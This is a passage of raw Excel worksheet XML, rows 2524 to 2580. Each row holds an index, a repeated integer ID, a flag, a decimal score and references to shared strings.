        <v>0.77410000562667847</v>
      </c>
      <c r="F2524" t="s">
        <v>3911</v>
      </c>
      <c r="G2524" t="s">
        <v>4983</v>
      </c>
      <c r="H2524" t="s">
        <v>4984</v>
      </c>
    </row>
    <row r="2525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2525" s="1">
        <v>2523</v>
      </c>
      <c r="B2525">
        <v>7282</v>
      </c>
      <c r="C2525">
        <v>7282</v>
      </c>
      <c r="D2525">
        <v>1</v>
      </c>
      <c r="E2525">
        <v>0.90869998931884766</v>
      </c>
      <c r="F2525" t="s">
        <v>3911</v>
      </c>
      <c r="G2525" t="s">
        <v>4985</v>
      </c>
      <c r="H2525" t="s">
        <v>4986</v>
      </c>
    </row>
    <row r="2526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2526" s="1">
        <v>2524</v>
      </c>
      <c r="B2526">
        <v>1403</v>
      </c>
      <c r="C2526">
        <v>1403</v>
      </c>
      <c r="D2526">
        <v>1</v>
      </c>
      <c r="E2526">
        <v>0.46369999647140497</v>
      </c>
      <c r="F2526" t="s">
        <v>3911</v>
      </c>
      <c r="G2526" t="s">
        <v>4987</v>
      </c>
      <c r="H2526" t="s">
        <v>4988</v>
      </c>
    </row>
    <row r="2527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2527" s="1">
        <v>2525</v>
      </c>
      <c r="B2527">
        <v>23</v>
      </c>
      <c r="C2527">
        <v>23</v>
      </c>
      <c r="D2527">
        <v>1</v>
      </c>
      <c r="E2527">
        <v>0.45109999179840088</v>
      </c>
      <c r="F2527" t="s">
        <v>3911</v>
      </c>
      <c r="G2527" t="s">
        <v>4989</v>
      </c>
      <c r="H2527" t="s">
        <v>4990</v>
      </c>
    </row>
    <row r="2528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2528" s="1">
        <v>2526</v>
      </c>
      <c r="B2528">
        <v>7346</v>
      </c>
      <c r="C2528">
        <v>7346</v>
      </c>
      <c r="D2528">
        <v>1</v>
      </c>
      <c r="E2528">
        <v>0.99620002508163452</v>
      </c>
      <c r="F2528" t="s">
        <v>3911</v>
      </c>
      <c r="G2528" t="s">
        <v>4991</v>
      </c>
      <c r="H2528" t="s">
        <v>4992</v>
      </c>
    </row>
    <row r="2529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2529" s="1">
        <v>2527</v>
      </c>
      <c r="B2529">
        <v>1245</v>
      </c>
      <c r="C2529">
        <v>1245</v>
      </c>
      <c r="D2529">
        <v>1</v>
      </c>
      <c r="E2529">
        <v>0.63609999418258667</v>
      </c>
      <c r="F2529" t="s">
        <v>3911</v>
      </c>
      <c r="G2529" t="s">
        <v>4993</v>
      </c>
      <c r="H2529" t="s">
        <v>4994</v>
      </c>
    </row>
    <row r="2530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2530" s="1">
        <v>2528</v>
      </c>
      <c r="B2530">
        <v>1219</v>
      </c>
      <c r="C2530">
        <v>1219</v>
      </c>
      <c r="D2530">
        <v>1</v>
      </c>
      <c r="E2530">
        <v>0.49340000748634338</v>
      </c>
      <c r="F2530" t="s">
        <v>3911</v>
      </c>
      <c r="G2530" t="s">
        <v>4995</v>
      </c>
      <c r="H2530" t="s">
        <v>4996</v>
      </c>
    </row>
    <row r="2531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2531" s="1">
        <v>2529</v>
      </c>
      <c r="B2531">
        <v>4910</v>
      </c>
      <c r="C2531">
        <v>4910</v>
      </c>
      <c r="D2531">
        <v>1</v>
      </c>
      <c r="E2531">
        <v>0.68129998445510864</v>
      </c>
      <c r="F2531" t="s">
        <v>3911</v>
      </c>
      <c r="G2531" t="s">
        <v>4997</v>
      </c>
      <c r="H2531" t="s">
        <v>4998</v>
      </c>
    </row>
    <row r="2532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2532" s="1">
        <v>2530</v>
      </c>
      <c r="B2532">
        <v>6380</v>
      </c>
      <c r="C2532">
        <v>6380</v>
      </c>
      <c r="D2532">
        <v>1</v>
      </c>
      <c r="E2532">
        <v>0.99819999933242798</v>
      </c>
      <c r="F2532" t="s">
        <v>3911</v>
      </c>
      <c r="G2532" t="s">
        <v>4999</v>
      </c>
      <c r="H2532" t="s">
        <v>5000</v>
      </c>
    </row>
    <row r="2533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2533" s="1">
        <v>2531</v>
      </c>
      <c r="B2533">
        <v>4827</v>
      </c>
      <c r="C2533">
        <v>4827</v>
      </c>
      <c r="D2533">
        <v>1</v>
      </c>
      <c r="E2533">
        <v>0.8870999813079834</v>
      </c>
      <c r="F2533" t="s">
        <v>3911</v>
      </c>
      <c r="G2533" t="s">
        <v>5001</v>
      </c>
      <c r="H2533" t="s">
        <v>5002</v>
      </c>
    </row>
    <row r="2534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2534" s="1">
        <v>2532</v>
      </c>
      <c r="B2534">
        <v>3664</v>
      </c>
      <c r="C2534">
        <v>3664</v>
      </c>
      <c r="D2534">
        <v>1</v>
      </c>
      <c r="E2534">
        <v>0.57239997386932373</v>
      </c>
      <c r="F2534" t="s">
        <v>3911</v>
      </c>
      <c r="G2534" t="s">
        <v>5003</v>
      </c>
      <c r="H2534" t="s">
        <v>5004</v>
      </c>
    </row>
    <row r="2535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2535" s="1">
        <v>2533</v>
      </c>
      <c r="B2535">
        <v>1281</v>
      </c>
      <c r="C2535">
        <v>1281</v>
      </c>
      <c r="D2535">
        <v>1</v>
      </c>
      <c r="E2535">
        <v>0.99080002307891846</v>
      </c>
      <c r="F2535" t="s">
        <v>3911</v>
      </c>
      <c r="G2535" t="s">
        <v>5005</v>
      </c>
      <c r="H2535" t="s">
        <v>5006</v>
      </c>
    </row>
    <row r="2536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2536" s="1">
        <v>2534</v>
      </c>
      <c r="B2536">
        <v>7331</v>
      </c>
      <c r="C2536">
        <v>7331</v>
      </c>
      <c r="D2536">
        <v>1</v>
      </c>
      <c r="E2536">
        <v>0.97039997577667236</v>
      </c>
      <c r="F2536" t="s">
        <v>3911</v>
      </c>
      <c r="G2536" t="s">
        <v>5007</v>
      </c>
      <c r="H2536" t="s">
        <v>5008</v>
      </c>
    </row>
    <row r="2537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2537" s="1">
        <v>2535</v>
      </c>
      <c r="B2537">
        <v>1313</v>
      </c>
      <c r="C2537">
        <v>1313</v>
      </c>
      <c r="D2537">
        <v>1</v>
      </c>
      <c r="E2537">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2537" t="s">
        <v>3911</v>
      </c>
      <c r="G2537" t="s">
        <v>5009</v>
      </c>
      <c r="H2537" t="s">
        <v>5010</v>
      </c>
    </row>
    <row r="2538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2538" s="1">
        <v>2536</v>
      </c>
      <c r="B2538">
        <v>5864</v>
      </c>
      <c r="C2538">
        <v>5864</v>
      </c>
      <c r="D2538">
        <v>1</v>
      </c>
      <c r="E2538">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2538" t="s">
        <v>3911</v>
      </c>
      <c r="G2538" t="s">
        <v>5011</v>
      </c>
      <c r="H2538" t="s">
        <v>5012</v>
      </c>
    </row>
    <row r="2539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2539" s="1">
        <v>2537</v>
      </c>
      <c r="B2539">
        <v>1308</v>
      </c>
      <c r="C2539">
        <v>1308</v>
      </c>
      <c r="D2539">
        <v>1</v>
      </c>
      <c r="E2539">
        <v>0.63590002059936523</v>
      </c>
      <c r="F2539" t="s">
        <v>3911</v>
      </c>
      <c r="G2539" t="s">
        <v>5013</v>
      </c>
      <c r="H2539" t="s">
        <v>5014</v>
      </c>
    </row>
    <row r="2540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2540" s="1">
        <v>2538</v>
      </c>
      <c r="B2540">
        <v>1278</v>
      </c>
      <c r="C2540">
        <v>1278</v>
      </c>
      <c r="D2540">
        <v>1</v>
      </c>
      <c r="E2540">
        <v>0.67869997024536133</v>
      </c>
      <c r="F2540" t="s">
        <v>3911</v>
      </c>
      <c r="G2540" t="s">
        <v>5015</v>
      </c>
      <c r="H2540" t="s">
        <v>5016</v>
      </c>
    </row>
    <row r="2541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2541" s="1">
        <v>2539</v>
      </c>
      <c r="B2541">
        <v>5573</v>
      </c>
      <c r="C2541">
        <v>5573</v>
      </c>
      <c r="D2541">
        <v>1</v>
      </c>
      <c r="E2541">
        <v>0.99140000343322754</v>
      </c>
      <c r="F2541" t="s">
        <v>3911</v>
      </c>
      <c r="G2541" t="s">
        <v>5017</v>
      </c>
      <c r="H2541" t="s">
        <v>5018</v>
      </c>
    </row>
    <row r="2542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2542" s="1">
        <v>2540</v>
      </c>
      <c r="B2542">
        <v>5865</v>
      </c>
      <c r="C2542">
        <v>5865</v>
      </c>
      <c r="D2542">
        <v>1</v>
      </c>
      <c r="E2542">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2542" t="s">
        <v>3911</v>
      </c>
      <c r="G2542" t="s">
        <v>5019</v>
      </c>
      <c r="H2542" t="s">
        <v>5020</v>
      </c>
    </row>
    <row r="2543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2543" s="1">
        <v>2541</v>
      </c>
      <c r="B2543">
        <v>1302</v>
      </c>
      <c r="C2543">
        <v>1302</v>
      </c>
      <c r="D2543">
        <v>1</v>
      </c>
      <c r="E2543">
        <v>0.99690002202987671</v>
      </c>
      <c r="F2543" t="s">
        <v>3911</v>
      </c>
      <c r="G2543" t="s">
        <v>5021</v>
      </c>
      <c r="H2543" t="s">
        <v>5022</v>
      </c>
    </row>
    <row r="2544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2544" s="1">
        <v>2542</v>
      </c>
      <c r="B2544">
        <v>5869</v>
      </c>
      <c r="C2544">
        <v>5869</v>
      </c>
      <c r="D2544">
        <v>1</v>
      </c>
      <c r="E2544">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2544" t="s">
        <v>3911</v>
      </c>
      <c r="G2544" t="s">
        <v>5023</v>
      </c>
      <c r="H2544" t="s">
        <v>5024</v>
      </c>
    </row>
    <row r="2545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2545" s="1">
        <v>2543</v>
      </c>
      <c r="B2545">
        <v>5868</v>
      </c>
      <c r="C2545">
        <v>5868</v>
      </c>
      <c r="D2545">
        <v>1</v>
      </c>
      <c r="E2545">
        <v>0.98110002279281616</v>
      </c>
      <c r="F2545" t="s">
        <v>3911</v>
      </c>
      <c r="G2545" t="s">
        <v>5025</v>
      </c>
      <c r="H2545" t="s">
        <v>5026</v>
      </c>
    </row>
    <row r="2546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2546" s="1">
        <v>2544</v>
      </c>
      <c r="B2546">
        <v>7929</v>
      </c>
      <c r="C2546">
        <v>7929</v>
      </c>
      <c r="D2546">
        <v>1</v>
      </c>
      <c r="E2546">
        <v>0.9976000189781189</v>
      </c>
      <c r="F2546" t="s">
        <v>3911</v>
      </c>
      <c r="G2546" t="s">
        <v>5027</v>
      </c>
      <c r="H2546" t="s">
        <v>5028</v>
      </c>
    </row>
    <row r="2547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2547" s="1">
        <v>2545</v>
      </c>
      <c r="B2547">
        <v>3657</v>
      </c>
      <c r="C2547">
        <v>3657</v>
      </c>
      <c r="D2547">
        <v>1</v>
      </c>
      <c r="E2547">
        <v>0.85650002956390381</v>
      </c>
      <c r="F2547" t="s">
        <v>3911</v>
      </c>
      <c r="G2547" t="s">
        <v>5029</v>
      </c>
      <c r="H2547" t="s">
        <v>5030</v>
      </c>
    </row>
    <row r="2548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2548" s="1">
        <v>2546</v>
      </c>
      <c r="B2548">
        <v>5870</v>
      </c>
      <c r="C2548">
        <v>5870</v>
      </c>
      <c r="D2548">
        <v>1</v>
      </c>
      <c r="E2548">
        <v>0.99980002641677856</v>
      </c>
      <c r="F2548" t="s">
        <v>3911</v>
      </c>
      <c r="G2548" t="s">
        <v>5031</v>
      </c>
      <c r="H2548" t="s">
        <v>5032</v>
      </c>
    </row>
    <row r="2549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2549" s="1">
        <v>2547</v>
      </c>
      <c r="B2549">
        <v>5887</v>
      </c>
      <c r="C2549">
        <v>5887</v>
      </c>
      <c r="D2549">
        <v>1</v>
      </c>
      <c r="E2549">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2549" t="s">
        <v>3911</v>
      </c>
      <c r="G2549" t="s">
        <v>5033</v>
      </c>
      <c r="H2549" t="s">
        <v>5034</v>
      </c>
    </row>
    <row r="2550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2550" s="1">
        <v>2548</v>
      </c>
      <c r="B2550">
        <v>1277</v>
      </c>
      <c r="C2550">
        <v>1277</v>
      </c>
      <c r="D2550">
        <v>1</v>
      </c>
      <c r="E2550">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2550" t="s">
        <v>3911</v>
      </c>
      <c r="G2550" t="s">
        <v>5035</v>
      </c>
      <c r="H2550" t="s">
        <v>5036</v>
      </c>
    </row>
    <row r="2551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2551" s="1">
        <v>2549</v>
      </c>
      <c r="B2551">
        <v>5876</v>
      </c>
      <c r="C2551">
        <v>5876</v>
      </c>
      <c r="D2551">
        <v>1</v>
      </c>
      <c r="E2551">
        <v>0.7906000018119812</v>
      </c>
      <c r="F2551" t="s">
        <v>3911</v>
      </c>
      <c r="G2551" t="s">
        <v>5037</v>
      </c>
      <c r="H2551" t="s">
        <v>5038</v>
      </c>
    </row>
    <row r="2552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2552" s="1">
        <v>2550</v>
      </c>
      <c r="B2552">
        <v>4877</v>
      </c>
      <c r="C2552">
        <v>4877</v>
      </c>
      <c r="D2552">
        <v>1</v>
      </c>
      <c r="E2552">
        <v>0.45080000162124628</v>
      </c>
      <c r="F2552" t="s">
        <v>3911</v>
      </c>
      <c r="G2552" t="s">
        <v>5039</v>
      </c>
      <c r="H2552" t="s">
        <v>5040</v>
      </c>
    </row>
    <row r="2553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2553" s="1">
        <v>2551</v>
      </c>
      <c r="B2553">
        <v>7301</v>
      </c>
      <c r="C2553">
        <v>7301</v>
      </c>
      <c r="D2553">
        <v>1</v>
      </c>
      <c r="E2553">
        <v>0.74860000610351563</v>
      </c>
      <c r="F2553" t="s">
        <v>3911</v>
      </c>
      <c r="G2553" t="s">
        <v>5041</v>
      </c>
      <c r="H2553" t="s">
        <v>5042</v>
      </c>
    </row>
    <row r="2554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2554" s="1">
        <v>2552</v>
      </c>
      <c r="B2554">
        <v>6378</v>
      </c>
      <c r="C2554">
        <v>6378</v>
      </c>
      <c r="D2554">
        <v>1</v>
      </c>
      <c r="E2554">
        <v>0.81239998340606689</v>
      </c>
      <c r="F2554" t="s">
        <v>3911</v>
      </c>
      <c r="G2554" t="s">
        <v>5043</v>
      </c>
      <c r="H2554" t="s">
        <v>5044</v>
      </c>
    </row>
    <row r="2555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2555" s="1">
        <v>2553</v>
      </c>
      <c r="B2555">
        <v>4833</v>
      </c>
      <c r="C2555">
        <v>4833</v>
      </c>
      <c r="D2555">
        <v>1</v>
      </c>
      <c r="E2555">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2555" t="s">
        <v>3911</v>
      </c>
      <c r="G2555" t="s">
        <v>5045</v>
      </c>
      <c r="H2555" t="s">
        <v>5046</v>
      </c>
    </row>
    <row r="2556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2556" s="1">
        <v>2554</v>
      </c>
      <c r="B2556">
        <v>4876</v>
      </c>
      <c r="C2556">
        <v>4876</v>
      </c>
      <c r="D2556">
        <v>1</v>
      </c>
      <c r="E2556">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2556" t="s">
        <v>3911</v>
      </c>
      <c r="G2556" t="s">
        <v>5047</v>
      </c>
      <c r="H2556" t="s">
        <v>5048</v>
      </c>
    </row>
    <row r="2557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2557" s="1">
        <v>2555</v>
      </c>
      <c r="B2557">
        <v>6357</v>
      </c>
      <c r="C2557">
        <v>6357</v>
      </c>
      <c r="D2557">
        <v>1</v>
      </c>
      <c r="E2557">
        <v>0.99620002508163452</v>
      </c>
      <c r="F2557" t="s">
        <v>3911</v>
      </c>
      <c r="G2557" t="s">
        <v>5049</v>
      </c>
      <c r="H2557" t="s">
        <v>5050</v>
      </c>
    </row>
    <row r="2558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2558" s="1">
        <v>2556</v>
      </c>
      <c r="B2558">
        <v>1275</v>
      </c>
      <c r="C2558">
        <v>1275</v>
      </c>
      <c r="D2558">
        <v>1</v>
      </c>
      <c r="E2558">
        <v>0.74479997158050537</v>
      </c>
      <c r="F2558" t="s">
        <v>3911</v>
      </c>
      <c r="G2558" t="s">
        <v>5051</v>
      </c>
      <c r="H2558" t="s">
        <v>5052</v>
      </c>
    </row>
    <row r="2559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2559" s="1">
        <v>2557</v>
      </c>
      <c r="B2559">
        <v>4875</v>
      </c>
      <c r="C2559">
        <v>4875</v>
      </c>
      <c r="D2559">
        <v>1</v>
      </c>
      <c r="E2559">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2559" t="s">
        <v>3911</v>
      </c>
      <c r="G2559" t="s">
        <v>5053</v>
      </c>
      <c r="H2559" t="s">
        <v>5054</v>
      </c>
    </row>
    <row r="2560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2560" s="1">
        <v>2558</v>
      </c>
      <c r="B2560">
        <v>3641</v>
      </c>
      <c r="C2560">
        <v>3641</v>
      </c>
      <c r="D2560">
        <v>1</v>
      </c>
      <c r="E2560">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2560" t="s">
        <v>3911</v>
      </c>
      <c r="G2560" t="s">
        <v>5055</v>
      </c>
      <c r="H2560" t="s">
        <v>5056</v>
      </c>
    </row>
    <row r="2561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2561" s="1">
        <v>2559</v>
      </c>
      <c r="B2561">
        <v>4842</v>
      </c>
      <c r="C2561">
        <v>4842</v>
      </c>
      <c r="D2561">
        <v>1</v>
      </c>
      <c r="E2561">
        <v>0.99690002202987671</v>
      </c>
      <c r="F2561" t="s">
        <v>3911</v>
      </c>
      <c r="G2561" t="s">
        <v>5057</v>
      </c>
      <c r="H2561" t="s">
        <v>5058</v>
      </c>
    </row>
    <row r="2562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2562" s="1">
        <v>2560</v>
      </c>
      <c r="B2562">
        <v>4872</v>
      </c>
      <c r="C2562">
        <v>4872</v>
      </c>
      <c r="D2562">
        <v>1</v>
      </c>
      <c r="E2562">
        <v>0.85949999094009399</v>
      </c>
      <c r="F2562" t="s">
        <v>3911</v>
      </c>
      <c r="G2562" t="s">
        <v>5059</v>
      </c>
      <c r="H2562" t="s">
        <v>5060</v>
      </c>
    </row>
    <row r="2563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2563" s="1">
        <v>2561</v>
      </c>
      <c r="B2563">
        <v>7335</v>
      </c>
      <c r="C2563">
        <v>7335</v>
      </c>
      <c r="D2563">
        <v>1</v>
      </c>
      <c r="E2563">
        <v>0.90850001573562622</v>
      </c>
      <c r="F2563" t="s">
        <v>3911</v>
      </c>
      <c r="G2563" t="s">
        <v>5061</v>
      </c>
      <c r="H2563" t="s">
        <v>5062</v>
      </c>
    </row>
    <row r="2564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2564" s="1">
        <v>2562</v>
      </c>
      <c r="B2564">
        <v>4845</v>
      </c>
      <c r="C2564">
        <v>4845</v>
      </c>
      <c r="D2564">
        <v>1</v>
      </c>
      <c r="E2564">
        <v>0.54579997062683105</v>
      </c>
      <c r="F2564" t="s">
        <v>3911</v>
      </c>
      <c r="G2564" t="s">
        <v>5063</v>
      </c>
      <c r="H2564" t="s">
        <v>5064</v>
      </c>
    </row>
    <row r="2565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2565" s="1">
        <v>2563</v>
      </c>
      <c r="B2565">
        <v>1330</v>
      </c>
      <c r="C2565">
        <v>1330</v>
      </c>
      <c r="D2565">
        <v>1</v>
      </c>
      <c r="E2565">
        <v>0.84500002861022949</v>
      </c>
      <c r="F2565" t="s">
        <v>3911</v>
      </c>
      <c r="G2565" t="s">
        <v>5065</v>
      </c>
      <c r="H2565" t="s">
        <v>5066</v>
      </c>
    </row>
    <row r="2566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2566" s="1">
        <v>2564</v>
      </c>
      <c r="B2566">
        <v>3667</v>
      </c>
      <c r="C2566">
        <v>3667</v>
      </c>
      <c r="D2566">
        <v>1</v>
      </c>
      <c r="E2566">
        <v>0.60259997844696045</v>
      </c>
      <c r="F2566" t="s">
        <v>3911</v>
      </c>
      <c r="G2566" t="s">
        <v>5067</v>
      </c>
      <c r="H2566" t="s">
        <v>5068</v>
      </c>
    </row>
    <row r="2567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2567" s="1">
        <v>2565</v>
      </c>
      <c r="B2567">
        <v>4565</v>
      </c>
      <c r="C2567">
        <v>4565</v>
      </c>
      <c r="D2567">
        <v>1</v>
      </c>
      <c r="E2567">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2567" t="s">
        <v>3911</v>
      </c>
      <c r="G2567" t="s">
        <v>5069</v>
      </c>
      <c r="H2567" t="s">
        <v>5070</v>
      </c>
    </row>
    <row r="2568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2568" s="1">
        <v>2566</v>
      </c>
      <c r="B2568">
        <v>33</v>
      </c>
      <c r="C2568">
        <v>33</v>
      </c>
      <c r="D2568">
        <v>1</v>
      </c>
      <c r="E2568">
        <v>0.67510002851486206</v>
      </c>
      <c r="F2568" t="s">
        <v>3911</v>
      </c>
      <c r="G2568" t="s">
        <v>5071</v>
      </c>
      <c r="H2568" t="s">
        <v>5072</v>
      </c>
    </row>
    <row r="2569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2569" s="1">
        <v>2567</v>
      </c>
      <c r="B2569">
        <v>7907</v>
      </c>
      <c r="C2569">
        <v>7907</v>
      </c>
      <c r="D2569">
        <v>1</v>
      </c>
      <c r="E2569">
        <v>0.82749998569488525</v>
      </c>
      <c r="F2569" t="s">
        <v>3911</v>
      </c>
      <c r="G2569" t="s">
        <v>5073</v>
      </c>
      <c r="H2569" t="s">
        <v>5074</v>
      </c>
    </row>
    <row r="2570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2570" s="1">
        <v>2568</v>
      </c>
      <c r="B2570">
        <v>3561</v>
      </c>
      <c r="C2570">
        <v>3561</v>
      </c>
      <c r="D2570">
        <v>1</v>
      </c>
      <c r="E2570">
        <v>0.66380000114440918</v>
      </c>
      <c r="F2570" t="s">
        <v>3911</v>
      </c>
      <c r="G2570" t="s">
        <v>5075</v>
      </c>
      <c r="H2570" t="s">
        <v>5076</v>
      </c>
    </row>
    <row r="2571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2571" s="1">
        <v>2569</v>
      </c>
      <c r="B2571">
        <v>4748</v>
      </c>
      <c r="C2571">
        <v>4748</v>
      </c>
      <c r="D2571">
        <v>1</v>
      </c>
      <c r="E2571">
        <v>0.91699999570846558</v>
      </c>
      <c r="F2571" t="s">
        <v>3911</v>
      </c>
      <c r="G2571" t="s">
        <v>5077</v>
      </c>
      <c r="H2571" t="s">
        <v>5078</v>
      </c>
    </row>
    <row r="2572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2572" s="1">
        <v>2570</v>
      </c>
      <c r="B2572">
        <v>1520</v>
      </c>
      <c r="C2572">
        <v>1520</v>
      </c>
      <c r="D2572">
        <v>1</v>
      </c>
      <c r="E2572">
        <v>0.6226000189781189</v>
      </c>
      <c r="F2572" t="s">
        <v>3911</v>
      </c>
      <c r="G2572" t="s">
        <v>5079</v>
      </c>
      <c r="H2572" t="s">
        <v>5080</v>
      </c>
    </row>
    <row r="2573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2573" s="1">
        <v>2571</v>
      </c>
      <c r="B2573">
        <v>7239</v>
      </c>
      <c r="C2573">
        <v>7239</v>
      </c>
      <c r="D2573">
        <v>1</v>
      </c>
      <c r="E2573">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2573" t="s">
        <v>3911</v>
      </c>
      <c r="G2573" t="s">
        <v>5081</v>
      </c>
      <c r="H2573" t="s">
        <v>5082</v>
      </c>
    </row>
    <row r="2574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2574" s="1">
        <v>2572</v>
      </c>
      <c r="B2574">
        <v>1517</v>
      </c>
      <c r="C2574">
        <v>1517</v>
      </c>
      <c r="D2574">
        <v>1</v>
      </c>
      <c r="E2574">
        <v>0.69120001792907715</v>
      </c>
      <c r="F2574" t="s">
        <v>3911</v>
      </c>
      <c r="G2574" t="s">
        <v>5083</v>
      </c>
      <c r="H2574" t="s">
        <v>5084</v>
      </c>
    </row>
    <row r="2575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2575" s="1">
        <v>2573</v>
      </c>
      <c r="B2575">
        <v>1516</v>
      </c>
      <c r="C2575">
        <v>1516</v>
      </c>
      <c r="D2575">
        <v>1</v>
      </c>
      <c r="E2575">
        <v>0.98989999294281006</v>
      </c>
      <c r="F2575" t="s">
        <v>3911</v>
      </c>
      <c r="G2575" t="s">
        <v>5085</v>
      </c>
      <c r="H2575" t="s">
        <v>5086</v>
      </c>
    </row>
    <row r="2576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2576" s="1">
        <v>2574</v>
      </c>
      <c r="B2576">
        <v>1536</v>
      </c>
      <c r="C2576">
        <v>1536</v>
      </c>
      <c r="D2576">
        <v>1</v>
      </c>
      <c r="E2576">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2576" t="s">
        <v>3911</v>
      </c>
      <c r="G2576" t="s">
        <v>5087</v>
      </c>
      <c r="H2576" t="s">
        <v>5088</v>
      </c>
    </row>
    <row r="2577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2577" s="1">
        <v>2575</v>
      </c>
      <c r="B2577">
        <v>1515</v>
      </c>
      <c r="C2577">
        <v>1515</v>
      </c>
      <c r="D2577">
        <v>1</v>
      </c>
      <c r="E2577">
        <v>0.99309998750686646</v>
      </c>
      <c r="F2577" t="s">
        <v>3911</v>
      </c>
      <c r="G2577" t="s">
        <v>5089</v>
      </c>
      <c r="H2577" t="s">
        <v>5090</v>
      </c>
    </row>
    <row r="2578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2578" s="1">
        <v>2576</v>
      </c>
      <c r="B2578">
        <v>6404</v>
      </c>
      <c r="C2578">
        <v>6404</v>
      </c>
      <c r="D2578">
        <v>1</v>
      </c>
      <c r="E2578">
        <v>0.75019997358322144</v>
      </c>
      <c r="F2578" t="s">
        <v>3911</v>
      </c>
      <c r="G2578" t="s">
        <v>5091</v>
      </c>
      <c r="H2578" t="s">
        <v>5092</v>
      </c>
    </row>
    <row r="2579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2579" s="1">
        <v>2577</v>
      </c>
      <c r="B2579">
        <v>7241</v>
      </c>
      <c r="C2579">
        <v>7241</v>
      </c>
      <c r="D2579">
        <v>1</v>
      </c>
      <c r="E2579">
        <v>0.99360001087188721</v>
      </c>
      <c r="F2579" t="s">
        <v>3911</v>
      </c>
      <c r="G2579" t="s">
        <v>5093</v>
      </c>
      <c r="H2579" t="s">
        <v>5094</v>
      </c>
    </row>
    <row r="2580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2580" s="1">
        <v>2578</v>
      </c>
      <c r="B2580">
        <v>3700</v>
      </c>
      <c r="C2580">
        <v>3700</v>
      </c>
      <c r="D2580">
        <v>1</v>
      </c>
      <c r="E2580">
        <v>0.99879997968673706</v>
      </c>
      <c r="F2580" t="s">
        <v>3911</v>
      </c>
      <c r="G2580" t="s">
        <v>5095</v>
      </c>
      <c r="H2580" t="s">
        <v>5096</v>
      </c>
    </row>
    <row r="2581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2581" s="1">
        <v>2579</v>
      </c>
      <c r="B2581">
        <v>7242</v>
      </c>
      <c r="C2581">
        <v>7242</v>
      </c>
      <c r="D2581">
        <v>1</v>
      </c>
      <c r="E2581">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2581" t="s">
        <v>3911</v>
      </c>
      <c r="G2581" t="s">
        <v>5097</v>
      </c>
      <c r="H2581" t="s">
        <v>5098</v>
      </c>
    </row>
    <row r="2582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2582" s="1">
        <v>2580</v>
      </c>
      <c r="B2582">
        <v>7890</v>
      </c>
      <c r="C2582">
        <v>7890</v>
      </c>
      <c r="D2582">
        <v>1</v>
      </c>
      <c r="E2582">
        <v>0.99959999322891235</v>
      </c>
      <c r="F2582" t="s">
        <v>3911</v>
      </c>
      <c r="G2582" t="s">
        <v>5099</v>
      </c>
      <c r="H2582" t="s">
